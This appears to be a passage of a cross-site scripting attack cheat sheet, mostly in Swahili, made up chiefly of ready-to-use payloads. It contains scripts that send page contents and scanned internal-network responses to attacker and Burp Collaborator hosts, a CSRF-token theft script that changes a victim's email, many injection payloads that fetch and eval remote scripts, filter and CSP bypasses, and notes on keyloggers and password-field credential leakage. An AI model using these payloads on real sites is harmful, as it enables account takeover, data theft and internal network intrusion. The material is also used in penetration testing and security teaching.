var attacker = "http://10.10.14.8/exfil";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open('GET', url, true);
xhr.send(null);
Pata IP za ndani
<script>
var q = []
var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
var wait = 2000
var n_threads = 51
// Prepare the fetchUrl functions to access all the possible
for(i=1;i<=255;i++){
q.push(
function(url){
return function(){
fetchUrl(url, wait);
}
}('http://192.168.0.'+i+':8080'));
}
// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for(i=1; i<=n_threads; i++){
if(q.length) q.shift()();
}
function fetchUrl(url, wait){
console.log(url)
var controller = new AbortController(), signal = controller.signal;
fetch(url, {signal}).then(r=>r.text().then(text=>
{
location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now()
}
))
.catch(e => {
if(!String(e).includes("The user aborted a request") && q.length) {
q.shift()();
}
});
setTimeout(x=>{
controller.abort();
if(q.length) {
q.shift()();
}
}, wait);
}
</script>
Wakati data yoyote inapoingizwa katika uwanja wa nywila, jina la mtumiaji na nywila vinatumwa kwa seva ya washambuliaji, hata kama mteja anachagua nywila iliyohifadhiwa na haandika chochote, taarifa za kuingia zitavuja.
Keylogger
Nilipokuwa nikitafuta katika github, nilipata kadhaa tofauti:
Unaweza pia kutumia metasploit http_javascript_keylogger
Kuiba token za CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>
<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>
<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>
<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload== onerror=eval(atob(this.id))>
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload== autofocus>
<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
Regex - Upataji wa Maudhui ya Siri
Kutoka hii ripoti inawezekana kujifunza kwamba hata kama baadhi ya thamani zinapotea kutoka JS, bado inawezekana kuziona katika sifa za JS katika vitu tofauti. Kwa mfano, ingizo la REGEX bado linaweza kupatikana baada ya thamani ya ingizo la regex kuondolewa:
// Do regex with flag
flag="CTF{FLAG}"
re=/./g
re.test(flag);
// Remove flag value, nobody will be able to get it, right?
flag=""
// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
Una XSS kwenye tovuti inayotumia caching? Jaribu kuiboresha hiyo hadi SSRF kupitia Edge Side Include Injection na payload hii:
<esi:include src="http://yoursite.com/capture" />
Tumia ili kupita vizuizi vya kuki, vichujio vya XSS na mengi zaidi!
Taarifa zaidi kuhusu mbinu hii hapa: XSLT.
XSS katika PDF inayoundwa kwa dinamik
Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia pembejeo zinazodhibitiwa na mtumiaji, unaweza kujaribu kudanganya bot inayounda PDF ili kutekeleza msimbo wa JS usio na mipaka.
Hivyo, ikiwa bot ya kuunda PDF inapata aina fulani ya HTMLtags, itakuwa inafasiri hizo, na unaweza kuitumia tabia hii kusababisha Server XSS.
AMP, inayolenga kuongeza utendaji wa ukurasa wa wavuti kwenye vifaa vya rununu, inajumuisha vitambulisho vya HTML vilivyoongezwa na JavaScript ili kuhakikisha utendaji kwa kuzingatia kasi na usalama. Inasaidia anuwai ya vipengele kwa ajili ya vipengele mbalimbali, vinavyopatikana kupitia AMP components.
Muundo wa AMP for Email unapanua vipengele maalum vya AMP kwa barua pepe, na kuwapa wapokeaji uwezo wa kuingiliana na maudhui moja kwa moja ndani ya barua zao pepe.